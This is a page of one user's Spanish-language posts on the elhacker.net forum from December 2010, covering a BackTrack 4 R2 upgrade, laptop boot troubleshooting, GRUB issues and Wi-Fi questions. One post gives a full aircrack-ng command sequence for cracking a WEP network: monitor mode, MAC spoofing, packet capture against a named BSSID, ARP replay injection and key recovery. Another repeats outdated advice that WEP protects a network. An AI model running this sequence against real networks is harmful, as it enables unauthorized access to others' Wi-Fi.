elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 ... 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 [46] 47 48 49 50 51 52 53
451  Sistemas Operativos / GNU/Linux / actualizar backtrack r1 a batrack r2 en: 9 Diciembre 2010, 16:41 pm
bueno poco hay que decir os dejo el link http://sanatas.com/content.php?153-BackTrack-4-R2


salu2

bueno boy a intentar dejarlo aqui aber si puedo



Código:
Los que no tienen el iso, aqui les dejo los link de descarga:

BackTrack 4 R2 Release ISO

Last Update: 22.11.2010
Name:: bt4-r2.iso Size: 2000 MB
MD5: 9a94caa0e980a7331e9abc1d4c42c9a9

Download: http://ftp.halifax.rwth-aachen.de/backtrack/bt4-r2.iso


BackTrack 4 R2 Release VMware Image

Last Update: 22.11.2010
Name:: bt4-r2-vm.tar.bz2 Size: 2400 MB
MD5: 95c8b727d01b96b6df84381065cd9da6

Download: http://ftp.halifax.rwth-aachen.de/ba...-r2-vm.tar.bz2

Y para los que quieren solo actualizar el Kernel aquí les dejo un tutoríal:

Actualizando de BackTrack 4 Final (o R1) a BackTrack R2

Citar
apt-get update
Citar
apt-get dist-upgrade
Citar
apt-get install linux-image-2.6.35.8

Si te pregunta algo acerca de actualizar el lsb-release - contesta con una "y"

Citar
Configuration file `/etc/lsb-release' ==>
 Modified (by you or by a script) since installation. ==>
 Package distributor has shipped an updated version. What would you like to do about it ?
 Your options are: Y or I : install the package maintainer's version N or O : keep your currently-installed version D :
 show the differences between the versions Z :
 background this process to examine the situation The default action is to keep your current version. *** lsb-release
 (Y/I/N/O/D/Z) [default=N] ? y

Código:
Actualizando el Kernel
No detengas la instalacion del Kernel:

http://sanatas.com/files/upload/imag..._bt4_r2_ac.png

menu.lst
Selecciona que instale4 un nuevo menu.lst:

http://sanatas.com/files/upload/imag..._bt4_r2_ab.png

Una vez que todo se haya descargado e instalado, haremos algunos ajustes para que quede todo igual, ,lo primero sera reiniciar.

Citar
reboot
Entramos de nuevo a BackTrack. Ahora repararemos la pantalla de inicio:
Citar
fix-splash
Ahora agregaremos algunos paquetes que no están en R1:
Citar
apt-get install postgresql-backtrack-config bf3 linux-backtrack-firmware
Ahora preparamos las fuentes de nuestro kernel:
Citar
apt-get install linux-source
Citar
cd /usr/src/
Citar
tar jxpf linux-source-2.6.35.8.tar.bz2
Citar
rm linux
Citar
ln -s linux-source-2.6.35.8 linux
Citar
cd linux
Citar
cp /boot/config-2.6.35.8 .config
Citar
make scripts && make prepare
Citar
ln -s /usr/src/linux /lib/modules/2.6.35.8/build
Citar
apt-get clean
Citar
cd /root/
Reparamos el wallpaper:
Citar
wget backtrack-linux.org/bt4r2.png
Citar
mv bt4r2.png /opt/kde3/share/wallpapers/bt4.png
Y por ultimo reiniciamos para que quede actualizado a R2!
452  Informática / Hardware / Re: Portatil con pantalla rota en: 9 Diciembre 2010, 16:12 pm
simorg dejare ese avatar mientras busco otro mas peño

VILLANO  ahora tengo una duda imagino que es un porrazo que se llevo el pc ...porque la pantalla no se parte sola
si le metes el programa low level format  este te dejara la pc limpia sin distro y te reconocera sin tocar la bios el cd en la disquetera o el usb ...porque claro el pc al no tener nada pillara lo que le metas
PERO isi tienes jodido la disquetera o el usb y no te coje el arranque ¡¡¡¡te quedaras sin distro  bueno no se ...DEBES DEJAR LOW LEVET FORMAT COMO ULTIMO RECURSO ES MI UMILDE OPINION
  PRUEBA LAS OBCIONES DE LOS COMPAÑERO

porcierto que quieres instalar VILLANO UN SALUDO
453  Informática / Hardware / Re: Portatil con pantalla rota en: 9 Diciembre 2010, 14:45 pm
Pero ahora quiero formatear y no me inicia desde el bios, sino desde el logo de win2

creo que el sabe entrar pero no le funciona     ¡¡¡si no sabe entrar en la bios estamos aqui haciendo el .@@@...¡¡¡¡en fin  jejeje.......sin ofender amigo  VILLANO es una manera de hablar  ;-)

porque debes darle la orden de arranque  del cd o usb


en el mio es pulsano f10  

un ejenplo busca tu modelo y un tuto porque hay no se debe tocar si no sabes

http://pulsar.unizar.es/gluz/manual-gluz/c181.html
454  Informática / Hardware / Re: Portatil con pantalla rota en: 9 Diciembre 2010, 13:08 pm
bueno yo entiendo poco de pc VILLANO pero tedeberia funcionar la bios compañeros

si el pc se llevo un castañazo y partio la pantalla se tejoderia algo mas ...¡¡¡pienso yo  nose !!:huh:

iitu problen es que no puedes bootear

si bas a instalar un linux lo tendras que hacer dentro de windows

y si bas a instalar un windows le tendras que pasar el loot level format creo que se llama
te dejara el pc limpio para que metas el cd windows no hara falta tocar la bios

loot level format  enterate primero como funciona ya que te elimina la distro

no se me ocurre nada mas yo lo haria de esa forma un salu2
455  Sistemas Operativos / GNU/Linux / Re: bt4 en: 9 Diciembre 2010, 11:11 am
amigo aunque te ponga eso que es una pagina del nabegor de tu firefox o google que te abre liliusb ...el iso te lo monta bien


pero ahora biendo bien todos los programas que usaste para bootear la iso ...que son muchos
creo que es la iso ....yo descargaria otra y de otro sitio ..¡¡¡no se me ocurre nada de como ayudarte   porque te lo te nia que aber booteado

mira prueba sin elegir la obcion de arriba solo eligue la iso

456  Seguridad Informática / Wireless en Linux / Re: problema con los DATAS en: 9 Diciembre 2010, 10:47 am
amigo es una wlan_xx  ami me ocurrio lo mismo y era el que no habia trafico pero si es una wlan_ solo nesesitas 1,data o  4como mucho

no creo que sea por los programas que instalastes ..no deberia afectarle ..

mira yo me conecto por wifi y como esta el tiempo ...apenas cojo red se me corta y la tengo pared con pared....


¡¡¡porque te funciona todo bien ..solo son las datas lo que no coje
457  Sistemas Operativos / GNU/Linux / Re: Problema con Linux Mint, backtrack y grub en: 8 Diciembre 2010, 16:53 pm
gracias Bytheface ..ni por asomo ubiera podido hacerlo sin la ayudas de ustedes ...un salu2 ;-)

ademas pongo el aministrador de arranque a 0 y arranca mint muy bien sin el grub

para cojer el backtrack le doy un segudo y lo pillo ...meaquedado bastante bien ahora a prepararla

saludos  ;-)
458  Seguridad Informática / Hacking Wireless / Re: Cuantos IVs voy a necesitar? en: 8 Diciembre 2010, 16:06 pm
mira esto lo suelo hacer yo i la verda va vastante bien pruebalo aver que tal

Código:

sudo airmon-ng stop wlan0

Código:

sudo ifconfig wlan0 down

Código:

sudo macchanger --mac 00:11:22:33:44:55 wlan0

Código:

sudo airmon-ng start wlan0

Código:

sudo airodump-ng mon0

-----------CONTROL+C-------------

Código:

sudo airodump-ng -c 1 --bssid E0:91:53:0F:3F:D4 -w captura mon0

ESA VENTANA NO LA CIERRES SI NO SE JODERA TODO

Código:

sudo aireplay-ng -1 0 -a E0:91:53:0F:3F:D4 -h 00:11:22:33:44:55 mon0

cuando te de salida para escribir pones este
Código:

sudo aireplay-ng -3 -b E0:91:53:0F:3F:D4 -h 00:11:22:33:44:55 mon0


Código:

sudo aircrack-ng -z *.cap                   50.000iv ya la tienes ami suele tardar 5 a 8 minutos  
459  Seguridad Informática / Hacking Wireless / Re: Router hackeado en: 8 Diciembre 2010, 15:58 pm
hola b2spirit  mira te boy a pasar dos respuestas sobre eso :

 la mejor manera de que no te roben tu internet es utilizar claves WEP y WPA trata de cambia cada semana tu clave y tambien  ocultar ssid de tu red wifi para no se pan que es tu red y tambien trata de filtras las mac de mas maquina que te roba señal....

---------------------------------------------------
Pon WPA2 AES con una clave que no este en ningun diccionario, es decir una palabra inventada, ademas del filtrado mac y oculta tu ssid

saludos
460  Sistemas Operativos / GNU/Linux / Re: Problema con Linux Mint, backtrack y grub en: 8 Diciembre 2010, 15:23 pm
mira que e sido torpe el wap era muchas gracias por averme ayudado ........ya que se hacerlo le dare mas espacio al linux ...¡¡¡heeii amigos muchas gracias







Páginas: 1 ... 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 [46] 47 48 49 50 51 52 53
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines